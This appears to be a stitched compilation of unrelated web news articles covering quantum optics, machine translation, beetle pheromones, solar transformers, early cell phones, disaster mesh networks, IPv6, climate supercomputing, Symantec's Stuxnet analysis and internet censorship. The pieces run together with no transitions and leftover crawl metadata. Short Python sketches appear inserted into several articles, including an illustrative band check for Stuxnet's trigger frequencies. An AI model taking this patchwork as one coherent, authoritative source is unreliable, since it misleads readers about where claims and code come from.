According to a paper, researchers from the National Institute of Standards and Technology (NIST) "repeatedly produced light pulses that each possessed two exactly opposite properties: specifically, opposite phases, as if the peaks of the light waves were superimposed on the troughs." Physicists call this optical state "Schrödinger's cat" after Nobel Prize winner Erwin Schrödinger, whose famous thought experiment described a cat that is simultaneously alive and dead. A "cat state" is a curiosity of the quantum world, where particles can exist in "superpositions" of two opposite properties simultaneously, the organization stated in a release.
NIST's quantum cat is the first to be made by detecting three photons at once and is one of the largest and most well-defined cat states ever made from light, researchers claimed.
Larger cat states have been created in different systems by other research groups, including one at NIST. In 2005 NIST scientists said they coaxed six atoms into spinning together in two opposite directions at the same time. The ambitious choreography could be useful in applications such as quantum computing and cryptography, as well as ultra-sensitive measurement techniques, all of which rely on exquisite control, NIST said.
"This is a new state of light, predicted in quantum optics for a long time," says NIST research associate Thomas Gerrits, lead author of the paper. "The technologies that enable us to get these really good results are ultrafast lasers, knowledge of the type of light needed to create the cat state, and photon detectors that can actually count individual photons."
The United States dollar is weak, driving an increasing orientation towards global exports. The Korean manufacturer Samsung and America’s Apple are in a patent war over mobile phones. The average annual income in China has quadrupled. Terrorists have taken root in remote countries, from those in the Sahel region of Africa to Chechnya.
Open up the news on any given day, and these are the global issues you’ll read about. Every one of these challenges impacts the US government. And each issue requires language translation, either into English or from English into another language.
But there are petabytes of data on the Internet to sift through and translate. The government doesn’t have the time or budget to hire an army of human translators for every job. Machine translation, while faster and more cost-effective than humans, only generates moderate to poor results for the majority of languages. The key lies in bridging the gap between translation memory — the databases of terms that feed machine translation — and human language intelligence.
Assimilation and Dissemination
Government agencies apply translation in two primary ways: assimilation and dissemination. Assimilation is used for intelligence purposes, economic research and information analysis activities. It involves gathering and translating content from countries around the world, then gauging the importance of each piece of content. Analysts can then judge the context of the information and escalate if necessary.
For example, SITE Intelligence Group, a private intelligence agency and government contractor, sifts through hours of video, blog posts, forums and other online sources every day to track and translate terrorist activity. In order to unveil important findings in a timely manner, SITE must translate quickly and effectively, not missing anything that might indicate suspicious actions. One of their more recent finds was a fatwa death sentence issued by an Egyptian clergyman, targeted at those involved with the “Innocence of Muslims” movie.
Dissemination, the other way that government uses translation, involves translating English documents into other languages for targeted distribution. For example, the World Health Organization has a substance abuse treatment program that is aiming to translate its processes for managing substance abuse for use in non-English-speaking cultures. The initiative aims to “achieve different language versions of the English …[with a] focus on cross-cultural and conceptual, rather than on linguistic/literal equivalence.” In other words, the WHO recognizes that translation is not just a matter of 1:1 language translation, but also of localization and coordination with differing cultural norms.
Language as Fuel
While different in nature, translation for assimilation and for dissemination have one major thing in common: both require the accumulation of linguistic resources, through translation memory, to propel future translations. This memory can be applied to machine translation to keep improving the translations it produces. Yet realistically, machine translation needs years, perhaps decades, more memory-building before it can be accurate across languages.
In the meantime, the ideal scenario would be for machines to generate decent baseline translations in all languages, then have humans edit and localize content if needed. With limited translation memory, how do we get there?
Humans and Machines Working Together
Human translators, whether professional or casual, must continue to feed high-quality translations into machine software. As more humans enter translations into their software, translation memory captures better information, enabling machine translation to produce higher-quality results. Machine translation generates garbage if it only receives bad translations, so in a sense, the onus is on humans to make machine translation smarter.
When machine translation has a large corpus of quality translation memory, it can generate instant and accurate translations. The government’s assimilation jobs will have readily available translations across languages, streamlining the process of intelligence, economic analysis and other tasks. For dissemination purposes, the government can use machines for basic translations, and humans to add cultural context.
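As a toy illustration of the translation-memory idea, the sketch below reuses the closest previously human-translated sentence. The memory entries and the 0.6 similarity cutoff are invented for illustration; production systems use far larger corpora and much more sophisticated matching:

```python
# Minimal translation-memory lookup: given a new source sentence, find the
# most similar sentence a human has already translated and reuse its target.
# The memory contents and the 0.6 similarity cutoff are illustrative only.
from difflib import SequenceMatcher

memory = {
    "the report is due on friday": "le rapport est attendu vendredi",
    "please review the attached document": "veuillez examiner le document ci-joint",
}

def lookup(source, cutoff=0.6):
    """Return the stored translation of the closest match, or None."""
    best_score, best_target = 0.0, None
    for src, tgt in memory.items():
        score = SequenceMatcher(None, source.lower(), src).ratio()
        if score > best_score:
            best_score, best_target = score, tgt
    return best_target if best_score >= cutoff else None

print(lookup("The report is due on Friday"))    # reuses the stored translation
print(lookup("completely unrelated sentence"))  # no match: defer to a human
```

When no close match exists, the system falls back to a human translator, whose work is then added to the memory, which is exactly the human-feeds-machine loop described above.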
We’re still a long way off from that reality today, but with enough human input, we can change the way translation is done in government.
(Phys.org)—A team of researchers with members from several institutions in Germany has found that the female burying beetle gives off a pheromone during parental care that causes male beetles to temper their sexual advances. In their paper published in the journal Nature Communications, the team describes their study of hundreds of the beetles captured in a German forest and brought to their lab.

Burying beetles lay their eggs in dead animal carcasses—when the young hatch, the mother, and to some extent, the father take bites from the carcass, chew it, and then feed it to the young. They also both fend off predators.

Prior research had shown that during this time period the female emits a gas of some sort, and that there was less sexual activity than normal. In this new effort, the researchers sought to learn the properties of the gas and to determine if it was responsible for the decrease in sexual activity, which in turn led to better care for the young. To find out, the team captured approximately 400 of the beetles, split them into groups of those with offspring and those without, and then ran several experiments and tests on them.

One of the tests involved measuring hormone levels in the females—in so doing, the researchers found that one called 'juvenile hormone III' increased, causing the female to be less fertile during the time she was caring for her young. They also found that she emitted a similar chemical called methyl geranate, a pheromone, during the same time frame.

Next the team ran several experiments to determine if it was the pheromone that caused the antiaphrodisiac-type effect in males—one of which involved monitoring the release levels of the pheromone and the sexual activity of males when the young were removed from both parents, preventing parental care. They found that the production and emission of the hormone did indeed suppress sexual advances by males, which allowed both to better parent their offspring.
The researchers note that the emitted chemical allows both parents to invest more resources into offspring, and that it represents an effective form of communication between parents that benefits them both and their offspring.

More information: Katharina C. Engel et al., "A hormone-related female anti-aphrodisiac signals temporary infertility and causes sexual abstinence to synchronize parental care," Nature Communications (2016). DOI: 10.1038/ncomms11035

Abstract: The high energetic demand of parental care requires parents to direct their resources towards the support of existing offspring rather than investing into the production of additional young. However, how such a resource flow is channelled appropriately is poorly understood. In this study, we provide the first comprehensive analysis of the physiological mechanisms coordinating parental and mating effort in an insect exhibiting biparental care. We show a hormone-mediated infertility in female burying beetles during the time the current offspring is needy and report that this temporary infertility is communicated via a pheromone to the male partner, where it inhibits copulation. A shared pathway of hormone and pheromone system ensures the reliability of the anti-aphrodisiac. Female infertility and male sexual abstinence provide for the concerted investment of parental resources into the existing developing young. Our study thus contributes to our deeper understanding of the mechanisms underlying adaptive parental decisions.
After a short dip in activity in 2013, the construction of large-scale solar power plants is leading the boom for America's solar industry. There are now 7,000 megawatts of solar projects sized over 1 megawatt planned for development in the U.S. over the next year, according to GTM Research. Roughly 1,300 megawatts of those projects have signed contracts that will begin in 2017, after the assumed deadline for a reduction of the federal Investment Tax Credit. Companies building those projects are speeding up development in an effort to capture the 30 percent ITC, and thus opting to bridge the financing gap themselves for a year. It's yet more proof of how important 2016 will be for the solar industry.

The solar industry shouldn't just be focused on putting up record numbers. It should be focused on ensuring every single megawatt is built to the highest standards, using the best equipment, in order to deliver the most competitive projects possible.

There are many stages of bankability when building a solar power plant. They include design, equipment procurement, installation and commissioning, and maintenance. From the inverter to the transformer to the substation, equipment procurement influences all of these areas in powerful ways. Solar developers understandably focus on levelized cost of energy. But when factoring in all these stages of bankability -- with equipment selection informing every stage -- a project is better measured by total operating costs.

We've already discussed how inverters fit into this picture. Let's take a look at another vital piece of equipment for projects: transformers.

It takes significant lead-time to find the right site, file the necessary permits, and start designing the project. Thinking about transformer requirements at the earliest stages of development is critical to ultimate success. Timeliness is one key reason.
Developers with projects in the beginning stages can easily prearrange an order with a manufacturer like ABB to secure production slots for a very minimal upfront price. That enables the equipment manufacturer to deal with shifting time constraints and move production as needed on their schedule. The longer the dialogue stays open with the supplier, the easier equipment design and delivery becomes.

This early engagement also helps the developer fully evaluate whether a transformer is properly tested, designed and suited for the specific solar project requirements. If the time-constrained customer chooses equipment based only on price at the last minute, they run the risk of getting the product delivered late -- and possibly getting a transformer that won't perform optimally over the lifetime of the system.

It's also important to anticipate delivery logistics and last-minute design changes. "Thinking about these types of issues can save lots of headaches during installation, when you are under substantial time constraints," said Jay Sperl, a regional business manager for transformers at ABB.

Technical factors are another reason to engage with equipment suppliers like ABB early in order to make installation easier, faster and less costly over the life of the project. ABB designs transformers specifically to match the characteristics of an inverter by working closely with manufacturers to understand load characteristics. This dictates simple things like the number of windings involved, and also more complex design characteristics such as how to couple inverters in a pad-mount or substation-like design.

There are also ways that pads can be pre-integrated into the transformer, transported, and then put in place on a gravel bed. This can save lots of installation headache if a time-constrained developer does not want to wait for pouring concrete. All of these issues can easily be addressed upfront when designing the project and reaching out to suppliers.
They can mean the difference between one week of installation and three weeks of installation. "If you start with the end in mind, what will the equipment look like? What can we do to avoid having surprises later? That will help you engage with suppliers to get an understanding of particular needs in order to benefit you," said Mike Engel, industrial market manager for transformers at ABB.

The actual production of a transformer might take a couple of months. The longer lead times come from design and technical review with the customer. Much of the hard work can be done far in advance if the developer engages with the supplier early in the process.

Thinking ahead and engaging with suppliers early will also help in the installation and commissioning process. Solar is an elegant technology, but it still takes a complex set of components and logistics to ensure a smooth installation and operation. The equipment supplier should be intimately familiar with all steps in the development cycle.

ABB designs every component of a transformer for a specific application, giving the developer a solution with a better lifecycle cost, not just a lower first cost. Over the last few years, ABB has built the elements necessary to bundle a complete solution -- dry- and wet-type transformers, inverters, wireless communications, automation, cybersecurity and installation -- to give solar project developers a turnkey service.

Logistics are as crucial as the design itself. If a developer builds a solar plant in a location with harsh weather conditions, components left sitting around the site for too long could get ruined. By optimizing every part of the equipment design and delivery process, ABB can ensure products get to a site when they're needed. This is yet another reason to think about equipment procurement very early in the development cycle.

"That's a big part of the benefit ABB brings. We can supply the engineering, the product delivery, the commissioning and the post-installation operation," said Doug Voda, the global segment leader for the smart grid medium voltage unit at ABB.

A lot is going right for solar in America at the moment. Development activity is at an all-time high and the resource is increasingly competitive with conventional alternatives on an economic basis. In order to ensure a successful 2016 and a transition to a 10 percent ITC, it's imperative that developers procure their equipment with the entire design, installation and commissioning process in mind.

"There's always a tremendous push in the fourth quarter of every year. Next year will be even heavier. We understand how the market works and the hurdles developers have to deal with. We can help them work through those at an early stage for a very minimal cost to ensure timely delivery," said Engel.
News Article | March 14, 2016
Nature Materials. doi:10.1038/nmat4590 Authors: Ron Feiner, Leeya Engel, Sharon Fleischer, Maayan Malki, Idan Gal, Assaf Shapira, Yosi Shacham-Diamand & Tal Dvir
News Article | August 22, 2016
Nature Materials. doi:10.1038/nmat4662 Authors: Venkatraman Gopalan & Roman Engel-Herbert New findings suggest that the mechanical stretching of layered crystals can transform them from a polar to a nonpolar state. This could spur the design of multifunctional materials controlled by an electric field.
News Article | April 3, 2016
43 years ago today, on April 3, 1973, a Motorola engineer named Martin Cooper made the first cell phone call. At the other end of the line from his 2.5 pound Motorola Dyna-Tac prototype was Cooper's chief rival, Joel S. Engel, the head of Bell Labs.

"Joel, this is Marty," Cooper said, according to a 2013 interview with the BBC. "I'm calling you from a cell phone, a real handheld portable cell phone."

"Portable" is relative, of course. The Dyna-Tac was as big as it was heavy: 9 x 5 x 1.75 inches. Packed inside of this shoebox were 30 circuit boards and a battery with about a half-hour of talk time that required 10 hours of recharging. It had no display, and offered only three features: talk, listen, dial. It was, in a word, dumb. But it worked.

The Dyna-Tac had by then already gone through some FCC testing in Washington, DC, and, on the big day, Cooper was to demonstrate the phone to a press conference at the Manhattan Hilton. Motorola was at the time trying to convince the FCC to allocate more frequency bandwidth to companies trying to commercialize the nascent technology. Hence, the PR push.

Before heading upstairs to the conference, Cooper decided that he'd better make sure the damn thing worked first. "He picked up the two-pound Motorola handset called the Dyna-Tac and pushed the 'off hook' button," a 2000 New York Times interview with Cooper recalls. "The phone came alive, connecting Mr. Cooper with the base station on the roof of the Burlington Consolidated Tower (now the Alliance Capital Building) and into the land-line system. To the bewilderment of some passers-by, he dialed the number and held the phone to his ear."

[Photo: The DynaTAC 8000x, the world's first cellular phone, modeled after the prototype Cooper used. Credit: Motorola Archives]

By that time, the primitive idea of mobile telephone communications was actually quite old.
AT&T had first commercialized a variation in the 1940s called Mobile Telephone Service, which was based on VHF radio communications, the range of frequencies more commonly employed for two-way radio use and television and radio broadcasts. Only a small slice of VHF channels were available to the service and collisions between transmissions were a common and prohibitive occurrence.

MTS was essentially a form of two-way radio communication with an operator in the middle that bridged landline callers with mobile callers. A "call" would be announced not by a ring, but by the voice of an operator over the radio saying that they had a call for that specific user. Every user would hear every incoming call and the idea was that they just ignored the ones that weren't for them. The hardware required for MTS also weighed about 80 pounds.

Real portability would have to wait for the advent of cellular communications. Here, users can be passed between base stations and frequencies can be continually reused. In addition to truly portable hardware, this means that users can reasonably move around from place to place with some guarantee of service.

In the 2000 Times interview, Cooper offered a prediction: "Cellular was the forerunner to true wireless communications. And just as people got used to taking phones with them everywhere, the way people use the Internet is ultimately going to be wireless. With our technology, you will be able to open your notebook anywhere and log on to the Internet at a very high speed with relatively low cost. At the moment, our story is about what a relatively small company is doing with high-tech stuff in Silicon Valley."
"But when people get used to logging on anywhere," he added, "well, that's going to be a revolution."
When Hurricane Katrina hit the coast of Louisiana, network traffic doubled for calls coming in and out of New Orleans as family members wanted to check in with loved ones while others called for emergency help.
But what happens when a disaster wipes out all wireless and wireline communication infrastructure? AT&T Labs researchers have developed a solution that could help first-responders and rescue workers locate people who need help and deploy resources without the need for fixed infrastructure like towers, routers, or access points.
AT&T's location-based Mobile-to-Mobile (M2M) casting protocol can map and link smart devices within a specific geographic area, such as a city block or a park. It can track certain people within that area, such as firemen, or be used to search a damaged building for survivors after an earthquake hits.
The protocol links mobile devices into "ad-hoc" mesh networks, in which each device is connected to multiple other devices — without having to rely on the mobile network. The use of GPS helps to locate individual devices within a given area.
The system is designed to handle heavy network conditions, such as a crowd at a college football game or an urban downtown disaster site. Potential services, such as "GeoQuerying", allow responders to locate devices and their users — helpful in search and rescue operations. "GeoAlarming" enables responders to remotely cause devices to emit a loud noise, allowing them to track by sound.
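Stripped of the networking details, a geo-query of this kind reduces to filtering known device positions by distance from a search point. The sketch below is a generic illustration, not AT&T's actual protocol; the device names and coordinates are invented:

```python
# Generic sketch of a "GeoQuery": find all devices whose last reported GPS
# position lies within a radius of a search point. This is an illustration,
# not AT&T's M2M casting protocol; the device data below is invented.
from math import radians, sin, cos, asin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 \
        + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))

def geo_query(devices, lat, lon, radius_km):
    """Return IDs of devices reported within radius_km of (lat, lon)."""
    return [d for d, (dlat, dlon) in devices.items()
            if haversine_km(lat, lon, dlat, dlon) <= radius_km]

devices = {
    "firefighter-1": (29.9511, -90.0715),  # at the search point
    "firefighter-2": (29.9530, -90.0700),  # a few blocks away
    "medic-7":       (30.4515, -91.1871),  # roughly 120 km away
}
print(geo_query(devices, 29.9511, -90.0715, 2.0))
```

In a real mesh deployment each device would report its position over multi-hop links rather than to a central server, but the distance filter at the core is the same.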
With solutions like a geo-targeting protocol and others similar to it, first responders would not only have faster access to critical information, but also expanded video and data capabilities.
For more information on AT&T's location-based M2M casting protocol visit: research.att.com
Today, 6 June 2012, the Internet Society is organizing the World IPv6 Launch. This does not mean that the Internet will be closed on the IPv4 protocol and transferred wholesale to IPv6, nor that everyone needs to make the transition today. Most of you reading this are already ready to use IPv6: most modern computers can configure their network interface cards (NICs) with both IPv4 and IPv6 addresses. So what is IPv6 Launch day? Big and important websites and Internet service providers are participating by beginning the transition from IPv4 and permanently enabling IPv6.
The Internet currently runs on IPv4, and most people in the world are using it at this moment. We have covered IP addressing and the IP protocol in other articles on this blog. Basically, this is the identification system the Internet uses to find the best routes across the world's biggest network and send information between end devices. An IPv4 address is written as four numbers, each from 0 to 255, and one is assigned to each device connected to the network. IPv4 allows around 4.3 billion addresses. That seemed more than enough in 1983: Vint Cerf, Chief Internet Evangelist at Google and a founding father of the Internet, has said that this number of addresses appeared sufficient for all future usage. But who could have predicted such rapid and wide expansion? Today the Internet needs more room than ever. Nowadays almost every device is connected to the Internet: phones, computers, TVs, watches, cars, receivers, fridges, and every one of them needs its own address to be able to communicate. IPv6 is the answer to that problem: the new version of the Internet Protocol expands the address space to a huge number, 340 trillion trillion trillion addresses. Written out, that number looks like this: 340,000,000,000,000,000,000,000,000,000,000,000,000. The new protocol will support future growth in the number of Internet users and enable new technologies and innovative services.
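The arithmetic behind those figures is easy to check: IPv4 addresses are 32 bits long and IPv6 addresses are 128 bits, so the two address pools contain 2^32 and 2^128 addresses respectively:

```python
# IPv4 addresses are 32 bits (four numbers of 0-255), IPv6 addresses are
# 128 bits, so the address pools are 2**32 and 2**128 respectively.
ipv4_pool = 2 ** 32
ipv6_pool = 2 ** 128

print(f"IPv4: {ipv4_pool:,} addresses")   # about 4.3 billion
print(f"IPv6: {ipv6_pool:,} addresses")   # about 3.4 x 10**38
print(f"IPv6 is {ipv6_pool // ipv4_pool:,} times larger")  # a factor of 2**96
```

That factor of 2^96 is why the protocol is expected to cover every phone, car and fridge for the foreseeable future.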
When is the transition happening?
Google says that it believes IPv6 is essential to the continued health and growth of the Internet, and that the World IPv6 Launch today marks the start of a coordinated, permanent transition to IPv6 by major websites and Internet service and equipment providers.
Harvard-MIT physics development gives potential for real-life lightsabers
Tuesday, Oct 1st 2013
Environmental control systems in research settings may be bringing one of the most hallowed items from science fiction closer to reality. Star Wars fans may finally get their very own lightsabers after researchers at the Harvard-MIT Center for Ultracold Atoms made a significant discovery while working with photons, in which they created a real-life version of the iconic weapon.
Since Star Wars first premiered in 1977, fans of the series have been fascinated with lightsabers, and scientists have spent years attempting to make an accurate replica. While several models have been made with lights and lasers, the results still fell short. As is often the case in science experiments, using environmental control systems was instrumental to ensuring optimal conditions for working with the photons. The researchers put rubidium atoms into a vacuum chamber, which was held a few degrees above absolute zero, according to International Business Times. Photons were fired through lasers into the atom clouds, giving off energy to the atoms and exiting combined as one molecule. Under the same conditions, which can be achieved through temperature monitoring, other scientists can duplicate this test while ensuring that they're keeping the atoms in the appropriate environment to produce the same result.
"It's a photonic interaction that's mediated by the atomic interaction," Harvard physics professor Mikhail Lukin told Mother Nature Network. "That makes these two photons behave like a molecule, and when they exit the medium, they're much more likely to do so together than as single photons."
The science of lightsabers
In research labs, it is critically important to keep the environment stable so that a study remains unaffected by unintended conditions. With controlled spaces, scientists are better able to predict and influence outcomes. Fluctuations in temperature can skew results and create a lack of consistency across future tests. Using a temperature sensor to keep the area optimal for the tested material produces more accurate results. Medical innovations like vaccines and organ regeneration have also made significant headway through similarly regulated conditions. The Harvard-MIT development is significant because it reveals an entirely new state of matter that could influence even more processes and studies. The researchers noted that although they may not be able to make a replica just yet, they do plan to use their discovery for other advancements such as quantum computing.
"We do this for fun, and because we're pushing the frontiers of science," Lukin told the International Business Times. "But it feeds into the bigger picture of what we're doing because photons remain the best possible means to carry quantum information. The handicap, though, has been that photons don't interact with each other."
Although the lightsaber that fans have been craving for years may still be a while off, the breakthrough shows promise for a product as well as other potential future innovations. As the researchers explore the molecule's capabilities, Star Wars fans can rest easy knowing that the technology does exist and that new opportunities may stem from the development. | <urn:uuid:a283416e-9fb9-4cdf-8493-c2a383b3c38c> | CC-MAIN-2017-04 | http://www.itwatchdogs.com/environmental-monitoring-news/research-labs/harvard-mit-physics-development-gives-potential-for-real-life-lightsabers-516422 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00495-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960653 | 618 | 2.9375 | 3 |
September is Supercomputing Month at the Department of Energy (DOE), so the government labs are showcasing some of the ground-breaking research that’s come about thanks to advancements in HPC technology and expertise. While it’s difficult to think of a scientific discipline, or even an academic field, that has not benefited from the enabling boost of souped-up computational power, climate research stands out as being particularly dependent on these compute and data-intensive capabilities.
What makes climate change unique is the necessity for large-scale models that have multiple variables, each complex in their own right. These elements include sea temperatures, sea currents, sea ice, the interaction between the surface of the ocean and the atmosphere, air temperatures over land and the impact of clouds. A supercomputer has to take into account all these factors, and more, and calculate all the possible ways they can interact. Simulations can tie up the biggest supercomputers in the world for weeks at a time. The scope and necessity of such an endeavor is matched only by the largest of supercomputing centers, which in the US, means the DOE labs.
As the primary scientific computing facility for the DOE's Office of Science, the National Energy Research Scientific Computing Center (NERSC), a division of Lawrence Berkeley National Laboratory, is one of the largest facilities in the world dedicated to basic science research. A sizable portion (12 percent) of the supercomputing resources at NERSC is allocated to global climate change research. That's nearly 150 million processor-hours of highly tuned computational might focused on an issue that is critical to humanity's future.
With each generation of supercomputers exponentially more powerful, climate models grow increasingly detailed. Science Writer Jon Bashor notes that the best global models of the late 1990s treated the western United States from the Pacific Ocean to the Rocky Mountains as a uniform landmass, even though there are topological features, like mountains, deserts and bodies of water, that affect climate. With the advances in hardware and software over the last two decades, today’s models have improved resolution down to 10-kilometer square blocks, while the next generation will drill down to the 2-kilometer level. The more fine-grained the models become, the more accurate the predictions will be.
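The resolution improvement compounds quickly: shrinking the grid spacing multiplies the number of horizontal cells needed to cover the same area. A back-of-the-envelope sketch (the grid sizes come from the article; the scaling arithmetic is standard, not from it):

```python
# Horizontal cell count scales with the inverse square of the grid spacing.
coarse_km = 10   # today's models, per the article
fine_km = 2      # next-generation models, per the article

cells_ratio = (coarse_km / fine_km) ** 2
print(f"A {fine_km} km grid needs {cells_ratio:.0f}x more horizontal "
      f"cells than a {coarse_km} km grid")
```

In practice the compute cost grows even faster than this, since finer grids generally force smaller time steps as well (the CFL stability condition), but the quadratic horizontal scaling alone explains why each resolution jump demands a new generation of supercomputers.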
Climate change is one of the most pressing issues facing our planet today, so accuracy is extremely important. People want to know if the models can be trusted and to what degree. Confidence is especially critical in estimates of anthropogenic climate change. Models are often vetted by checking certain scenarios against real-world results. A common evaluation technique is to “predict” climate sequences that have already occurred. This kind of backwards-looking analysis was taken on by the 20th Century Reanalysis Project, under the leadership of Gil Compo of the University of Colorado, Boulder, and the National Oceanic and Atmospheric Administration’s (NOAA) Earth System Research Laboratory. The project was awarded 8 million processor-hours at NERSC.
The project relies on a database of extreme global weather events from 1871 to the present day, culled from newspaper weather reports, measurements on land and sea for the first decades, and then as technology evolved, there were more detailed measurements from aircraft, satellites and other sensors. The team of top climate scientists fed the data into powerful supercomputers, including those at NERSC and the Oak Ridge Leadership Computing Facility in Tennessee, to create virtual climate time machine.
Simulations based on the model showed a remarkable degree of prescience. “The model accurately predicted a number of extreme weather conditions, including El Niño occurrences, the 1922 Knickerbocker snowstorm that hit the Atlantic Coast (causing the roof of the Knickerbocker Theater in Washington, D.C., to collapse, killing 98 people and injuring 133), the 1930s Dust Bowl and a hurricane that smashed into New York City in 1938,” reports Bashor.
The “predictions” were not only possible, but were calculated with great accuracy. Compo and his team had constructed a map of the Earth’s weather and climate variations since the late 1800s. The next step was using the data assimilation system for real predictions, specifically to anticipate future warming patterns.
As recently reported in Geophysical Research Letters, ongoing research carried out under the 20th Century Reanalysis Project has yielded independent confirmation of global land warming since 1901, providing further evidence of anthropogenic global climate change. Up to this point, the case for global climate warming rested on long-term measurements of air temperature from stations around the world. The Reanalysis Project, however, draws on other historical observations, including barometric pressure from 1901-2010.
“This is really the essence of science,” says Compo. “There is knowledge ‘A’ from one source and you think, ‘Can I get to that same knowledge from a completely different source?’ Since we had already produced the dataset, we looked at just how close our temperatures estimated using barometers were to the temperatures using thermometers.”
The 20th Century Reanalysis Project has been instrumental in boosting the confidence in estimates of past, present and future climate change, according to Compo. And because key variations and trends line up with traditional climate models, it increases the robustness of conclusions based on those data sets.
“If, for some reason, you didn’t believe global warming was happening, this confirms that global warming really has been occurring since the early 20th century,” notes Compo. | <urn:uuid:290752ec-fbe8-4043-b21f-074b309990c8> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/09/23/supercomputing_enables_climate_time_machine/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00495-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942896 | 1,156 | 3.734375 | 4 |
Some two months since the discovery of the Stuxnet worm made headlines and started speculations on who is behind it, Symantec‘s researchers have unearthed another piece of the puzzle that tells us a bit more about its likely target.
According to the latest results of the analysis of the worm’s code, Stuxnet was developed to search for industrial control systems that have frequency converter drives from a specific Finnish or Iranian vendor – or from both. These drives function as a power supply that can change the speed of a motor by changing the frequency of the output.
What Stuxnet does is drastically change the operating frequency of these motors from time to time, sabotaging the workings of the automation system that they run.
Stuxnet begins this procedure only after it has observed the drives operating at frequencies between 807 Hz and 1210 Hz for some period of time.
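As a purely hypothetical sketch (the names and structure below are illustrative, not Stuxnet's actual code), the trigger condition Symantec describes amounts to a band check on observed drive frequencies:

```python
# Illustrative only: the payload Symantec describes waits until it has seen
# drives running in the 807-1210 Hz band before altering their speed.
NORMAL_BAND = (807.0, 1210.0)  # Hz, per Symantec's analysis

def in_normal_band(freq_hz: float) -> bool:
    """Return True if a drive frequency falls in the monitored band."""
    low, high = NORMAL_BAND
    return low <= freq_hz <= high

observed = [1064.0, 1200.0, 850.0, 300.0]
print([in_normal_band(f) for f in observed])  # [True, True, True, False]
```

The point of the band check is target selection: ordinary industrial motors rarely run this fast, so only equipment matching the intended profile would ever satisfy the condition.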
Researcher Eric Chien says that these frequencies are actually a lot higher than those required to power, say, a conveyor belt in a factory. “Also, efficient low-harmonic frequency converter drives that output over 600Hz are regulated for export in the United States by the Nuclear Regulatory Commission as they can be used for uranium enrichment,” he notes. “We would be interested in hearing what other applications use frequency converter drives at these frequencies.”
According to Symantec’s updated paper on Stuxnet, the worm springs to life only when it detects 33 or more frequency converter drives from one or both of the two manufacturers, a fact that seems to imply that its developers had specific targets in mind and were familiar with their networks.
“I imagine there are not too many countries outside of Iran that are using an Iranian device. I can’t imagine any facility in the U.S. using an Iranian device,” Liam O Murchu, one of the Symantec researchers analyzing Stuxnet, told Wired. And he’s probably right. This speculation lends weight to the theory that the Iranian Bushehr nuclear power plant was Stuxnet’s main target.
By definition an iconoclast is "a person who attacks cherished beliefs, traditional institutions, etc. as being based on error or superstition; a breaker or destroyer of images, especially those set up for religious veneration." I use a wider definition of iconoclasm, including political iconoclasm - state ‘censorship’ of religious beliefs. As for religious intolerance, I’ll define it as “intolerance against another's religious beliefs”.
Make no mistake, there is nothing new about iconoclasm and intolerance. In fact, religious censors have been around for centuries. Iconoclasm was a huge part of the French Revolution, as people destroyed countless religious artifacts in the name of ‘freedom’. During Russia's October Revolution in 1917, religious materials were destroyed as part of the strategy to overthrow the government and put the Soviets into power. Sadly, the censorship of religious beliefs by state or people is still very much alive and well today.
Filtering religious images
You might think that all of our advances in technology would make it harder for iconoclasts to censor people's religious beliefs. You might think that the Internet is a place where all beliefs are possible. However, all of that technology actually makes it easier for censors to get their way. On the web, religious images aren't destroyed; they're simply filtered out of sight.
The biggest example? The UK's Digital Economy Bill - or, as it's known around the web, the "UK Internet Censorship Bill". Back in 2010, Parliament passed a bill that was supposed to prevent the theft of copyrighted materials, like illegally downloading music and movies. From there, Parliament extended the bill's reach so that it could also crack down on child pornography. After all, it makes sense to block something that's so illegal, immoral, and dangerous, right?
However, the Digital Economy Bill became broader and broader. At one point, Clause 18 of the bill said that the UK government could block ANY website that's deemed to be undesirable for public consumption. That specific clause was taken out, but its spirit remained. Once the bill was passed, UK Internet service providers were required to prevent their subscribers from accessing certain websites, as determined by the government.
Over the years, the Digital Economy Bill has continued to expand. In 2011, UK government officials met with representatives from Twitter, Facebook, and Blackberry to discuss ways to prevent certain people from using social media. After that, UK mobile providers began blocking certain websites from their smartphones. Mind you, many of those websites have nothing to do with child pornography. Many of them deal with LGBT rights, feminism, and even political satire.
And now, the UK government is taking on religion.
Specifically, they're instituting a country-wide firewall that will block, among other things, "esoteric" websites. By the time 2014 begins, UK Internet service providers will be forced to block websites that discuss things like Wicca, Kabbalah, Taoism, and Mysticism. After all, "esoteric" is an incredibly broad term, and the UK government seems to be painting the broadest picture possible.
Taking down religious concepts
What about America, where freedom of speech is one of the main reasons that the country was founded in the first place?
Back in 2010, the American Civil Liberties Union (ACLU) met with the House Committee on Foreign Affairs as part of the "Strategy for Countering Jihadist Websites". Congress' point was to prevent terrorists from using the web to recruit and carry out missions by taking down all jihadist-related websites. The ACLU, however, began with another point. Their concern was the broad meaning being given to "jihadist". Yes, terrorists commit horrible acts in the name of jihad, but to most Muslims, jihad is actually a spiritual struggle. According to the Koran, it's an individual's struggle to fulfill his religious duties. It's supposed to be an internal struggle, rather than an armed, violent fight on the streets. As a result, not ALL jihad-related websites should be considered a threat. More concerning, the ACLU pointed out that the title ‘Strategy for Countering Jihadist Websites’ “suggests an inherent evil in allowing the Internet to continue to exist in its current open form. Since terrorists may use the Internet to recruit new terrorists, as the narrative goes, Congress must do something to stop such online activity.” Yes, all of the web's capabilities can turn it into a weapon for terrorists, but why must law-abiding people risk being censored because of a few bad apples?
